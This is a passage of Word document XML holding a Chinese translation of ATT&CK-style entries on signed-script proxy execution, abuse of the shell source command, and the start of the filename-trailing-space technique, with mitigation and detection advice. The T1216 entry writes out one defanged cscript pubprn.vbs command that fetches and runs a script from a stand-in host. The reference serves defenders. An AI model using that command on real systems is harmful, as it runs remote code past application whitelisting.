          <w:p w14:paraId="4DFCB5E2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1216</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72DA8F31" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>逃逸，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45B440D0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:lastRenderedPageBreak/>
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F2748B3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="111CCC67" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18DA48F0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>是否支持远程：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>否</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="092CD78A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>绕过的防御：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>白名单，数字证书验证</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18556D07" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Praetorian</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2044593F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6FC56078" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0212D14F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用可信证书签名的脚本可用于代理执行恶意文件。此行为可能会绕过签名验证限制和不考虑使用这些脚本的应用白名单解决方案。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F484F7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>PubPrn.vbs</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>由微软签名，可用于从远程站点代理执行。命令举例</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9DB33B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还有其他一些签名脚本可以类似的方式使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F18B17" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2405"/>
        <w:gridCol w:w="7331"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00A21B67" w14:paraId="60D07A91" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="4E71D516" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="00087DD8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="395049C7" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38FB083C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>执行预防</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1177BB12" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在给定的环境中，可能不需要某些用于执行其他程序的签名脚本。如果</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>给定的系统或网络不需要</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>这些脚本，则使用应用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>白名单</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（用于</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>阻止脚本执行</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>）来防止攻击者滥用它们。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="582B1F86" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0965356B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABF0644" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控脚本进程（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cscript</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）和脚本（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pubprn.vbs</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）命令行参数，这些脚本可能用于代理执行恶意文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D60219D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Source</w:t>
      </w:r>
      <w:r w:rsidRPr="00B37DBE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="663478EC" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BF665BE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>编号</w:t>
            </w:r>
            <w:r>
              <w:t>: T1153</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46A9FE78" w14:textId="1E1076D0" w:rsidR="000F2665" w:rsidRDefault="00EB54DA" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidR="000F2665">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidR="000F2665">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="000F2665">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02941046" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>平台：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Linux, macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0540F645" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28346852" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FD2A0B" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>数据源：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FD2A0B">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程监控，文件监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D92E58C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>支持远程：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>否</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="077D1FAA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>版本：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="060FF079" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C88F34D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00BB2836" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00BB2836">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>source</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令在当前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中装载函数或者在当前上下文中执行文件。这个内置命令可通过两种不同方式允许，</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB2836">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>source /path/to/filename [arguments]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB2836">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>. /path/to/filename [arguments]</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB7FA9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意</w:t>
      </w:r>
      <w:r>
        <w:t>”.”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后面的空格。如果没有空格，会创建新的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来运行程序，而不是在当前上下文中运行程序。这通常用于确保一些特性或者功能对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有效或者更新某个具体的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEAA44C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00BB2836" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者会滥用这个功能来执行程序。使用这种技术执行文件无需提前设置可执行标记。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70ADAA7C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51723DB3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为基于滥用系统特性，这类攻击技术很难通过预防控制措施进行缓解。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B5D02C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28000127" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00BB2836" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>source shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令执行以及通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>source</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令执行启动的后续进程。为了让</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>source</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行调用，攻击者肯定会在磁盘上写入文件，这些文件可通过文件监控检测出来。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2338EE7D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="008411D6" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676EFD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件名后加空格</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="6517A0A0" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A220986" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>编号</w:t>
            </w:r>
            <w:r>
              <w:t>: T1151</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66D44AE5" w14:textId="48E7EC3E" w:rsidR="000F2665" w:rsidRDefault="00EB54DA" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidR="000F2665">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="000F2665">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御逃逸</w:t>
            </w:r>
            <w:r w:rsidR="00DE009F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidR="000F2665">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="794A1EA3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>平台：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Linux, macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B863F30" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5832E489" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>数据源：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B642D8">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件监控，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33763C47" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r>
              <w:t>Erye Hernandez, Palo Alto Networks</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59F347D5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
